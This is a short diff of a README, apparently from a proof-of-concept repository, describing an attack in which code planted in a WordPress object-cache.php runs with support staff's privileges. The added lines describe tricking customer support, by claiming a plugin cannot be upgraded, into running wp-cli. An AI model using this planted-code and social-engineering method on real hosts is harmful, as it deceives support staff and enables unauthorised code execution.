yoramvandevelde/wp-cli_attack_object_cache/README.md

         @curl_close($c);
 ```

-If this were inside object-cache.php and we would run this as a supportdesk account we see the following:
+So now we contact customer support and say that we cannot upgrade a plugin.
+When they execute wp-cli.phar the code in object-cache.php would be executed with their privileges.
+They would see the following:
 ```
 $ wp-cli.phar plugin list --skip-plugins --skip-themes
 +-------------------------------+----------+--------+---------+